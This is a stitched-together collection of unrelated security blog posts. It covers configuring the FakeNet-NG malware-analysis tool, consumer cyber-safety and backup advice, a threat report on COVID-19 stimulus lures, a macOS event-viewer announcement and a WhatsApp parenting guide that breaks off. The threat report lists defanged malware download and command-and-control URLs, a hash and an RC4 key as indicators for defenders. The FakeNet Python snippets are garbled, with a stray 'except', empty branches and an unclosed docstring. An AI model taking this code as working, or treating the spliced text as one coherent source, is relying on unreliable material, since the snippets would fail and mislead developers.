As you may have noticed, FakeNet-NG is not limited to serving HTML pages. Depending on the file type requested, FakeNet-NG can serve PE files, ELF files, JPG, GIF, etc. FakeNet-NG is configured with several default files for common types and can also be configured to serve up custom files. The defaultFiles directory contains several types of files for standard responses. For example, if malware sends an FTP GET request for evil.exe, FakeNet-NG will respond with the file defaultFiles\FakeNetMini.exe (the default response for .exe requests). This file is a valid Portable Executable file that displays a message box. By providing an actual PE file, we can observe the malware as it attempts to download and execute a malicious payload. An example FTP session and subsequent execution of the downloaded default file is shown in Figure 1.

Figure 1: Using FTP to download FakeNet-NG's default executable response

Most requests are adequately handled by this system. However, malware sometimes expects a file with a specific format, such as an image with an embedded PowerShell script, or an executable with a hash appended to the file for an integrity check . In cases like these, you can replace one of the default files with a file that meets the malware’s expectation. There is also an option in each of the relevant Listeners (modules that implement network protocols) configurations to modify the defaultFiles path. This allows FakeNet-NG to serve different files without overwriting or modifying default data. A customized FakeNet.html file is shown in Figure 2.

Figure 2: Modify the default FakeNet.html file to customize the response

Stage 2: Custom Binary Protocols

Many malware samples implement custom binary protocols which require specific byte sequences. For example, malware in the GH0ST family may require each message to begin with a signature such as "GH0ST". The default FakeNet-NG RawListener responds to unknown requests with an echo, i.e. it sends the same data that it has received. This behavior is typically sufficient. However, in cases where a custom response is required, you can still send the data the malware expects.

Custom TCP and UDP responses are now possible with FakeNet-NG. Consider a hypothetical malware sample that beacons the string “Hello” to its command and control (C2) server and waits for a response packet that begins with “FLARE” followed by a numeric command (0-9). We will now demonstrate several interesting ways FakeNet-NG can handle this scenario.

Static Custom Response

You can configure how the TCP and/or UDP Raw Listeners respond to traffic. In this example we tell FakeNet-NG how to respond to any TCP raw request (no protocol detected). First uncomment the Custom configuration option in the RawTCPListener section of fakenet/configs/default.ini as illustrated in Figure 3.

Enabled:     True
Port:        1337
Protocol:    TCP
Listener:    RawListener
UseSSL:      No
Timeout:     10
Hidden:      False
# To read about customizing responses, see docs/
Custom:    sample_custom_response.ini

Figure 3: Activate custom TCP response

Next configure the TcpRawFile custom response in fakenet\configs\sample_custom_response.ini as demonstrated in Figure 4. Make sure to comment-out or replace the default RawTCPListener instance.

InstanceName:     RawTCPListener
ListenerType:     TCP
TcpRawFile:       flare_command.txt

Figure 4: TCP static custom response specifications

Create the file fakenet\configs\flare_command.txt with the content FLARE0. TCP responses will now be generated from the contents of the file.

Dynamic Custom Response

Perhaps you want to issue commands dynamically rather than committing to a specific command in flare_command.txt. This can be achieved programmatically. Configure the TcpDynamic custom response in fakenet\configs\sample_custom_response.ini as demonstrated in Figure 5. Make sure to comment-out or replace the existing RawTCPListener instance.

InstanceName:     RawTCPListener

Figure 5: TCP dynamic custom response specifications

The file fakenet\configs\ can be used as a template for our dynamic response file We modify the HandleTcp() function and produce the new file fakenet\configs\ as illustrated in Figure 6. Now you can choose each command as the malware executes. Figure 7 demonstrates issuing commands dynamically using this configuration.

import socket

def HandleTcp(sock):

    while True:
            data = None

            data = sock.recv(1024)
        except socket.timeout:

        if not data:

        resp = raw_input('\nEnter a numeric command: ')
        command = bytes('FLARE' + resp + '\n')

Figure 6: TCP dynamic response script

Figure 7: Issue TCP dynamic commands

Stage 3: Custom HTTP Responses

Malware frequently implements its own encryption scheme on top of the popular HTTP protocol. For example, your sample may send an HTTP GET request to /comm.php?nonce=<random> and expect the C2 server response to be RC4 encrypted with the nonce value. This process is illustrated in Figure 8. How can we easily force the malware to execute its critical code path to observe or debug its behaviors?

Figure 8: Malware example that expects a specific key based on beacon data

For cases like these we recently introduced support for HTTP custom responses. Like TCP custom responses, the HTTPListener also has a new setting named Custom that enables dynamic HTTP responses. This setting also allows FakeNet-NG to select the appropriate responses matching specific hosts or URIs. With this feature, we can now quickly write a small Python script to handle the HTTP traffic dynamically based upon our malware sample.

Start by uncommenting the Custom configuration option in the HTTPListener80 section as illustrated in Figure 9.

Enabled:     True
Port:        80
Protocol:    TCP
Listener:    HTTPListener
UseSSL:      No
Webroot:     defaultFiles/
Timeout:     10
#ProcessBlackList: dmclient.exe, OneDrive.exe, svchost.exe, backgroundTaskHost.exe, GoogleUpdate.exe, chrome.exe
DumpHTTPPosts: Yes
DumpHTTPPostsFilePrefix: http
Hidden:      False
# To read about customizing responses, see docs/
Custom:    sample_custom_response.ini

Figure 9: HTTP Listener configuration

Next configure the HttpDynamic custom response in fakenet\configs\sample_custom_response.ini as demonstrated in Figure 10. Make sure to comment-out or replace the default HttpDynamic instance.

ListenerType:     HTTP
HttpURIs:         comm.php

Figure 10: HttpDynamic configuration

The file fakenet\configs\ can be used as a template for our dynamic response file We modify the HandleRequest() function as illustrated in Figure 11. FakeNet-NG will now encrypt responses dynamically with the nonce.

import socket
from arc4 import ARC4

# To read about customizing HTTP responses, see docs/

def HandleRequest(req, method, post_data=None):
    """Sample dynamic HTTP response handler.

    req : BaseHTTPServer.BaseHTTPRequestHandler
        The BaseHTTPRequestHandler that recevied the request
    method: str
        The HTTP method, either 'HEAD', 'GET', 'POST' as of this writing
    post_data: str
        The HTTP post data received by calling `` against the
        BaseHTTPRequestHandler that received the request.


    response = 'Ahoy\r\n'

    nonce = req.path.split('=')[1]
    arc4 = ARC4(nonce)
    response = arc4.encrypt(response)

    req.send_header('Content-Length', len(response))

Figure 11: Dynamic HTTP request handler

Stage 4: Manual Custom Responses

For even more flexibility, the all-powerful networking utility netcat can be used to stand-in for FakeNet-NG listeners. For example, you may want to use netcat to act as a C2 server and issue commands dynamically during execution on port 80. Launch a netcat listener before starting FakeNet-NG, and traffic destined for the corresponding port will be diverted to the netcat listener. You can then issue commands dynamically using the netcat interface as seen in Figure 12.

Figure 12: Use ncat.exe to manually handle traffic

FakeNet-NG's custom response capabilities are diverse. Read the documentation to learn how to boost your custom response high score.

Stage 5: Blacklisting Processes

Some analysts prefer to debug malware from a separate system. There are many reasons to do this; most commonly to preserve the IDA database and other saved data when malware inevitably corrupts the environment. The process usually involves configuring two virtual machines on a host-only network. In this setup, FakeNet-NG intercepts network traffic between the two machines, which renders remote debugging impossible. To overcome this obstacle, we can blacklist the debug server by instructing FakeNet-NG to ignore traffic from the debug server process.

When debugging remotely with IDA Pro, the standard debug server process for a 32-bit Portable Executable is win32_remote.exe (or dbgsrv.exe for WinDbg). All you need to do is add the process names to the ProcessBlackList configuration as demonstrated in Figure 13. Then, the debug servers can still communicate freely with IDA Pro while all other network traffic is captured and redirected by FakeNet-NG.

# Specify processes to ignore when diverting traffic. Windows example used here.
ProcessBlackList: win32_remote.exe, dbgsrv.exe

Figure 13: Modified configs/default.ini to allow remote debugging with IDA Pro

Blacklisting is also useful to filter out noisy processes from polluting Fakenet-NG captured network traffic. Examples include processes that attempt to update the Windows system or other malware analysis tools.

Additional settings are available for blacklisting ports and hosts. Please see the README for more details about blacklisting and whitelisting.

Stage 6: Executing Commands on Connection Events

Fakenet-NG can be configured to execute commands when a connection is made to a Listener. For example, this option can be used to attach a debugger to a running sample upon a connection attempt. Imagine a scenario where we analyze the packed sample named Lab18-01.exe from the Practical Malware Analysis labs. Using dynamic analysis, we can see that the malware beacons to its C2 server over TCP port 80 using the HTTP protocol as seen in Figure 14.

Figure 14: Malware beacons to its C2 server over TCP port 80

Wouldn’t it be nice if we could magically attach a debugger to Lab18-01.exe when a connection is made? We could speedrun the sample and bypass the entire unpacking stub and any potential anti-debugging tricks the sample may employ.

To configure Fakenet-NG to launch and attach a debugger to any process, modify the [HTTPListener80] section in the fakenet\configs\default.ini to include the ExecuteCmd option. Figure 15 shows an example of a complete [HTTPListener80] section.

Enabled:     True
Port:        80
Protocol:    TCP
Listener:    HTTPListener
UseSSL:      No
Webroot:     defaultFiles/
Timeout:     10
DumpHTTPPosts: Yes
DumpHTTPPostsFilePrefix: http
Hidden:      False
# Execute x32dbg –p to attach to a debugger. {pid} is filled in automatically by Fakenet-NG
ExecuteCmd: x32dbg.exe -p {pid}

Figure 15: Execute command option to run and attach x32dbg

In this example, we configure the HTTPListener on port 80 to execute the debugger x32dbg.exe, which will attach to a running process whose process ID is determined at runtime. When a connection is made to HTTPListener, FakeNet-NG will automatically replace the string {pid} with the process ID of the process that makes the connection. For a complete list of supported variables, please refer to the Documentation.

Upon restarting Fakenet-NG and running the sample again, we see x32dbg launch and automatically attach to Lab18-01.exe. We can now use memory dumping tools such as Scylla or the OllyDumpEx plugin to dump the executable and proceed to static analysis. This is demonstrated in Figure 16 and Figure 17.

Figure 16: Using FakeNet-NG to attach x32dbg to the sample (animated)

Figure 17: Fakenet-NG executes x32dbg upon connection to

Stage 7: Decrypting SSL Traffic

Often malware uses SSL for network communication, which hinders traffic analysis considerably as the packet data is encrypted. Using Fakenet-NG's ProxyListener, you can create a packet capture with decrypted traffic. This can be done using the protocol detection feature.

The proxy can detect SSL, and "man-in-the-middle" the socket in SSL using Python's OpenSSL library. It then maintains full-duplex connections with the malware and with the HTTP Listener, with both sides unaware of the other. Consequently, there is a stream of cleartext HTTP traffic between the Proxy and the HTTP Listener, as seen in Figure 18.

Figure 18: Cleartext streams between Fakenet-NG components

In order to keep FakeNet-NG as simple as possible, current default settings for FakeNet-NG do not have the proxy intercept HTTPS traffic on port 443 and create the decrypted stream. To proxy the data you need to set the HTTPListener443 Hidden attribute to True as demonstrated in Figure 19. This tells the proxy to intercept packets and detect the protocol based on packet contents. Please read our blog post on the proxy and protocol detection to learn more about this advanced feature.

Enabled:     True
Port:        443
Protocol:    TCP
Listener:    HTTPListener
UseSSL:      Yes
Webroot:     defaultFiles/
DumpHTTPPosts: Yes
DumpHTTPPostsFilePrefix: http
Hidden:      True

Figure 19: Hide the listener so the traffic will be proxied

We can now examine the packet capture produced by Fakenet-NG. The cleartext can be found in a TCP stream between an ephemeral port on localhost (ProxyListener) and port 80 on localhost (HTTPListener). This is demonstrated in Figure 20.

Figure 20: Cleartext traffic between HTTPListener and Proxy Listener

Conclusion (New Game+)

Fakenet-NG is the de facto standard network simulation tool for malware analysis. It runs without installation and is included in FLARE VM. In addition to its proven and tested default settings, Fakenet offers countless capabilities and configuration options. In this blog post we have presented several tricks to handle common analysis scenarios. To download the latest version, to see a complete list of all configuration options, or to contribute to Fakenet-NG, please see our Github repository.

How to Stay Cyber Safe While Social-Distancing

Do you find yourself working from home these days? Kids off school too? Then your daily life is set to change super-fast. Yes, there is so much to organise to implement this essential ‘social distancing’ strategy. But in the flurry to get everyone set up, it’s essential that we don’t cut corners, make rash decisions so we can ensure both our headspace and online safety aren’t at risk.

The New Era of Social-Distancing

Many workplaces have already instructed their staff to ‘social distance’ and work from home so we can ‘flatten the curve’ while others are probably not far away from making this decision.  Many Australian states have given parents the option to keep their children at home. So, even if you (and the kids) are not yet home, it’s wise to start thinking about how our work (and learn) from home lives might look while we are ‘social-distancing’ and, how can keep our households safe when online. Here’s a few things to consider:

  1. Breath. These are Uncertain Times

It’s completely normal to feel anxious and stressed in this time of great uncertainty. While we are hopeful that ‘social distancing’ measures will help minimise the impact of the virus, the truth is – we just don’t really know what the upcoming months will look like. Acknowledging that you (and all your family members) will be feeling anxious and ‘out of sorts’ at the moment is essential. Cutting family members some slack, particularly if you are all ‘cooped up’ together will definitely make for a smoother self-isolation experience!

  1. Always Think Critically & Don’t Overload on News

When we are feeling panicked and stressed, it’s easy for our rational brains to stop functioning. Social media feeds have been full of ‘miracle cures’ for COVID-19 which have been of great interest to many stressed out peeps. PLEASE avoid clicking links and ‘buying into’ this. Not only could these be links to malicious websites designed to extract your private information, but these themes just feed our anxiety. Instead, seek out advice from reputable medical institutions and authorities. Being a critical thinker online is more important now more than ever.

And if the constant barrage of news about the pandemic is affecting your (and your family’s) mood and outlook then take a break from it. Maybe limit yourself to checking for updates once per day as opposed to having constant updates come through on your phone. It’s super easy to disable news notifications, if you are Apple user, here’s what you need to do and, if you are an Android user, these tips may help.

  1. Ensure You Are Using the Correct Platforms & Software

Before you start downloading programs you think are helpful, check with your workplace or employer about their preferred platforms. It’s highly likely you will have most of the programs they require whether it’s Facetime, Slack, Zoom or Trello. But if you don’t, please ensure you download apps from a reputable source such as the AppStore or Google Play or a site that has been approved by your employer. Third party app sites are to be avoided at all costs because the chances are, you’ll score yourself some malicious software!

  1. Protect Yourself & Your Data

Please check whether you employer has security software and a Virtual Private Network (VPN) installed on your devices. If not, or you are using your ‘home’ devices to undertake company work, then ensuring that both your stored data and the data you share over the internet is protected is essential.

Using a device without security software is a little like leaving your front door open – you are essentially inviting anyone to enter. So, investing in a comprehensive security software solution that protects you from dodgy downloads, visiting fake websites, malicious software and viruses is a no brainer! A VPN will also protect the data that you share from your devices by effectively creating an encrypted tunnel between your device and the router – the ultimate way of keeping the cybercrimals out!

  1. Back-Up Your Data

Check with your employer to ensure that all your data will be backed up, even when working from home. If they can’t guarantee your work will be backed up then you need to find yourself a reliable, safe option. I am a Dropbox fan but Google Drive is also a great tool. But if you need something a little more robust then check out IDrive or IBackUp.

And don’t forget about the kids! If your offspring are remote schooling, ensure all their hard work is backed up too. Google Drive or Dropbox is a great solution for students.

  1. Manage Your Internet Usage at Home

If your household has two adults working from home plus a tribe of kids remote schooling, then chances are your internet may slow. With more than 90% of Aussies now accessing the internet through the NBN, many are worried that the spike in demand may create havoc.  While the folks from NBN keep assuring us that it’s all going to be fine, we may need to find ourselves staggering our internet use. Why not encourage your kids to do offline activities such as reading or craft while you have some designated time for emails or an online meeting? And don’t forget, you can always create a hotspot from your mobile for another internet source.

  1. Invest in Your Back & Neck – Splash Out on Some Gadgets

Setting up a designated workspace at home is critical to providing some structure in this new phase of your work life. Why not use this as an excuse to get properly setup?

I’ve worked from home for many years but could not have done so without my large monitor and my stand-up desk. Like many peeps, I have a dodgy neck so my stand-up desk and large monitor have meant that I can continue to work with no pain! I simply plug my laptop into my monitor and happy days – everything in enlarged and at eye height! On the days that I decide to work from my kitchen benchtop, my neck always starts to throb – you’d think I’d learn!

And don’t think you need to spend a fortune. A large monitor can cost as little as $200 and a stand-up desk not much more. If you are using these items for work, the chances are you’ll be able to claim these purchases as a tax deduction – why not talk to your accountant?

There is no doubt that 2020 will be ‘the year we will remember for the rest of our lives’. And while the bulk of us aren’t in the high-risk category, it is essential that we all do our bit so that we can protect our most vulnerable. So, please take the time to ensure you are cybersafe while setting up your new work (and school) from home life and even more importantly, keep washing your hands!!

Till Next Time

Stay well

Alex xx

The post How to Stay Cyber Safe While Social-Distancing appeared first on McAfee Blogs.

Don’t Be an April Fool – Protect Your Digital Assets

Be Part of World Back Up Data Day on 31st March

There are not many worse feelings that the realisation that a document you’ve worked tirelessly on has vanished! We’ve all been there and it’s not nice at all. Whether you break into a sweat, scream or even say a word you shouldn’t – losing precious data is downright awful.

With World Backup Day now a fixture on our calendars, there should be no excuses for not protecting your valuable document and digital files. So, please mark March 31 in your diary people because this is a great reminder to us all about ensuring we have all the right procedures in place to protect our digital assets.

What Does ‘Backing-Up’ Really Mean?

Backing-up means you have a second copy of your key files which includes documents, photos, videos and even your emails. And this second copy needs to be stored somewhere else that is away from your computer for example, on a hard drive or online using a cloud storage service.

Some people think that this process happens automatically, however, I’m here to inform you that it doesn’t. Unfortunately, there are no magic back-up fairies. We each need to take charge and set up processes to protect our precious documents.

Why Do We Need To Back-Up?

Take a minute to think about everything you have stored on your digital devices. Of course, there are important documents, emails and likely scans of essential documents but what about your music collection and the pics and videos of your family? Imagine losing these. I know I’d be heartbroken.

While there aren’t any recent studies into the value of our digital assets, in 2014 McAfee undertook research and found that Aussies valued their online assets at a whopping $30,000! So, 6 years later, I’d estimate that would figure would be closer to $50,000! Definitely a reason to take action!

But, Doesn’t Everyone Back-Up?

In short, no! According to the people at World Backup Day, 30% of us have never backed up! And when you consider that 113 phones are lost or stolen every minute, that 1 in 10 computers are infected with viruses every month and that 29% of lost data scenarios are caused by accidental human error – it really does make you wonder why!

Let’s Participate in World Back-Up Day!

Data is regarded as one of the most valuable assets in the modern world. It’s basically digital gold! While backing up your personal and sensitive data is something that should be done routinely, World Back-Up Day is a great reminder to us all that we need to get our back-up plan sorted! I know it all sounds tedious, but trust me, it’s less work than the trouble you’d find yourself in after losing important files!

Here are some easy tips to help you ensure you are taking the right steps to safeguard your data this World Backup Day!

  1. A Two-Pronged Approach Is Best

Take the extra step and go both routes for a thorough backup by using an external drive and a cloud service. Losing a document can be the most frustrating thing so it’s always better to be safe than sorry when it comes to your personal data.

  1. Don’t Forget About Your Mobile Device

Back up data from your mobile devices onto a central laptop or personal computer for an added layer of security and protection.

  1. Don’t Rely on Memory Alone!

While routinely backing up your data is one of the most important steps, it can be the first to slip our minds when life gets in the way. Make it super easy to regularly backup by using the existing automatic and scheduled backup features that already come with cloud services and many external drives.

  1. Test It Out!

On top of scheduling regular data backups, make it a habit to routinely check your ability to restore data from backups to ensure they have been performed correctly and haven’t been compromised.

Some of our ‘lowest’ family moments have been a result of family members forgetting to ‘back-up’.  Only months before last year’s HSC, no. 3 son left his laptop on a train. It took me days to recover from the news that he hadn’t been backing up despite my regular reminders!! Yes, we’re all human but if we can minimise the horrendous stress and upset that is caused by ‘lost’ documents and images then that can only be a good thing!

Happy World Back-Up Day everyone!


The post Don’t Be an April Fool – Protect Your Digital Assets appeared first on McAfee Blogs.

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovered themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different email addresses and had password protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto generated and follow the format <name>.<name><SevenNumberString> When these documents were opened and macros enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S.- and Canada financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

  • http://marchadvertisingnetwork4[.]com/post.php
  • http://marchadvertisingnetwork5[.]com/post.php
  • http://marchadvertisingnetwork6[.]com/post.php
  • http://marchadvertisingnetwork7[.]com/post.php
  • http://marchadvertisingnetwork8[.]com/post.php
  • http://marchadvertisingnetwork9[.]com/post.php
  • http://marchadvertisingnetwork10[.]com/post.php

Figure 1: Example lure using CAD

Figure 2: Example lure using AUD

Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.

Figure 4: Email lure referencing business grants and loans

Figure 5: SBA-themed message

Figure 6: Office 365 phishing page


Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new, they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism will be especially prepared to meet this challenge.

Scams Facing Consumers in the New Digital WFH Landscape

With many people having their normal day to day life turned upside down, scammers are capitalizing on consumers’ newfound lifestyles to make a financial gain or wreak havoc on users’ devicesLet’s take a look at the most recent threats that have emerged as a result of the pandemic 

Fraudulent Relief Checks

On Wednesday March 25, the Senate passed a relief bill that contains a substantial increase in unemployment benefits for Americans who have lost their jobs or have been furloughed due to the economic fallout from the pandemicFinancial scammers are likely to use this as an opportunity to steal money offered to Americans who are facing the negative economic effects of the pandemic, as these crooks could make consumers believe they need to pay money as a condition of receiving government relief. The Federal Trade Commission issued a warning to consumers to be on the lookout for fraudulent activity as the government implements these financial relief packages.  

Map Used to Track Pandemic Used to Spread Malware

According to security researcher Brian Krebs, criminals have started disseminating real-time, accurate information about global infection rates to spread malware. In one scheme, an interactive dashboard created by Johns Hopkins University is being used in malicious websites (and possibly in spam emails) to spread password-stealing malware.  Additionally, Krebs flagged a digital pandemic infection kit, which allows other criminals to purchase a bundled version of the map with the scammer’s preferred attack method. 

Texts, WhatsApp, and TikTok Spread Falsehoods

Due to the nature of the rapidly evolving pandemic, criminals are taking advantage of the situation by spreading misinformation. As more communities are being ordered to shelter in placemisleading text messages announcing a national quarantine claiming to come from the White House buzzed onto cell phones around the U.S. According to the Washington Post, the fraudulent text messages encouraged users to, “Stock up on whatever you guys need to make sure you have a two-week supply of everything. Please forward to your network.” These fake texts spread so widely that the White House’s National Security Council debunked the misleading claims in a Twitter post stating, “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” Communication apps like WhatsApp and social media platforms like TikTok have carried similar examples of this misinformation.  

Robocalls Offering Free Test Kits and Low-Cost Health Insurance

On top of fraudulent messages floating around via SMS, WhatsApp, and TikTok, scammers are also using robocalls to spread misinformation around the global pandemic, especially as more users are at home and available to answer phone calls as a result of self-isolation. According to CNNrobocalls from more than 60 different phone numbers are falsely offering low-priced health insurance and free coronavirus test kitsAnother type of robocall asks users to sign a petition to ban flights from China. Criminals are taking advantage of the fact that new information around the pandemic is constantly being released, presenting them with an opportunity to scam users by impersonating local and federal officials.  

Stay Safe Online With These Tips

During this time of uncertainty, it can be difficult to decipher what is fact from fiction. When it comes to the potential online threats around the recent pandemic, here’s what you can do to stay protected:  

Only trust official news sources

Be sure to only trust reputable news sites. This will help you filter out fake information that is just adding to the noise across the internet.  

Don’t share your personal or financial data

Although financial relief checks are not yet a reality, know that the federal government will not ask you to pay fees or charges upfront to receive these funds. Additionally, the government will not ask you for your Social Security number, bank account, or credit card number.  

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.  

Go directly to the source

If you receive information regarding the pandemic from an unknown user, go directly to the source instead of clicking on links within messages or attachments. For example, users should only trust the map tracking the pandemic’s spread found on the Johns Hopkins websiteUsing a tool like McAfee WebAdvisor can help users stay safe from similar threats while searching the web.  

Register for the FCC’s “Do Not Call” list

This can help keep you protected from scammers looking to capitalize on current events by keeping your number off their lists. 

Stay updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Scams Facing Consumers in the New Digital WFH Landscape appeared first on McAfee Blogs.

Honey, We’re Home! Securing Your Devices and Your Family Bond  

family device security

More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Too, with a new work-at-home lifestyle, the software (with time limits) can also make scheduling family breaks together much more manageable.

Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think its a hassle, consider the simplicity of a password manager. Using a password manager will make changing passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance or school-life (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids is teaching them with the same value.

It’s a new frontier parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

Crescendo: Real Time Event Viewer for macOS

Prior to 2017, researchers couldn’t easily monitor actions performed by a process on macOS and had to resort to coding scripts that produced low level system call data. FireEye released in 2017 that enabled collection of information on macOS at a higher level; at a simplified data set versus something like Dtrace. I created many versions of over the years and have received very positive feedback from users. Recently though, users have noticed it doesn't work on macOS Catalina (10.15)...

Originally, a kernel extension was required to provide the inspection capabilities offered by Unfortunately, kernel extensions are running in privileged mode which has very little protection from software bugs that may lead to system instability. This means kernel extensions should only be used if absolutely necessary. Microsoft and Apple have started providing engineers more userland alternatives to accomplish what previously required writing kernel code.

In Catalina, Apple released the Endpoint Security Framework (ESF) to provide a robust and (more importantly) safer way of getting access to internal operating system artifacts. Being a security guy, I’m not a huge fan when apps must ship with kernel extension to get their job done and I think this is a move in the right direction. With the coming release of 10.15.4, Apple will now pop-up a warning when a kernel extension is loaded that uses a set of these deprecated kernel programming interfaces (KPIs).

Now seemed like a good time to kick the tires on the Endpoint Security Framework. Also, what engineer doesn’t love to learn new languages, so why not write it all in Swift as well?

Introducing Crescendo

Crescendo is a real time event viewer for macOS that uses the ESF to show process executions and forks, file events, share mounting events, kernel extension loads, and IPC event data. ESF provides a vast amount of data, but the goal was to just pick out the things that analysts would be interested in when analyzing a piece of malware or trying to understand how a process (or component) works. Just the right amount of data without being a firehose of events to the user.

Here are some of the features of Crescendo:

  • System Extension using Endpoint Security Framework
  • Real time event viewer and event detail viewer
  • Search for easy filtering of events by process, PID, username, or event type
  • Filters for unsigned apps vs apple signed apps
  • Ability to export all events to JSON
  • Context highlighting when unsigned apps are executed

Apple has added some extra security features that require some extra setup for enabling Crescendo’s system extension. Head on over to the Getting Started section in the README to get started. I'm hopeful this inconvenience will be fixed in future versions.

Oh, One More Thing...

Crescendo is being released open source under the MIT license! It consists of a ready to use framework that wraps the ESF with a Swift interface, removing some of the nuances and providing a simple callback for event data. This way other developers don't have to understand all the inner details of the Endpoint Security Framework. One caveat, if you wish to use the framework in your own app, you must obtain an entitlement from Apple

Missing a feature you’d like to see? Submit a Pull Request!

Head over to the Crescendo Github to learn more and download the latest release.

Is WhatsApp Safe for Kids? Here’s What Parents Need to Know

WhatsApp Web

We may be talking about the TikTok app in our public circles, but there’s another app — just as widely used — that kids are hoping parents’ won’t ask too many questions about. That’s because they can use the messaging app WhatsApp to talk privately with friends, exchange content and videos, and (hopefully) fly under the parentals’ radar.

What is WhatsApp?

WhatsApp is a downloadable app that uses your phone’s internet connection (wifi) to send messages, photos, videos, or files. It also allows users to make real-time video calls (much like iOS’ FaceTime). The big perk: WhatsApp can be used by connecting to any wifi so users can avoid using up minutes or texting fees. If you travel internationally, using WhatsApp is a popular way to avoid expensive international calling charges.

Why do kids love WhatsApp?

It’s easy, it’s fun, it’s free. WhatsApp Messenger lets kids send text messages, videos, photos, and audio messages as well as make video calls to friends without message limits or fees. Oh, and so far, it’s ad free, which is a plus.

It’s a stealth chatting app. WhatsApp is a popular way to create group chats (up to 256 people) that parents won’t necessarily think to check. Often kids will meet someone on one app such as Snapchat or Instagram and move to WhatsApp because they feel its less public and less regulated by parents. Like any other app, it can also be hidden behind decoy or vault apps to avoid detection.

WhatsApp web
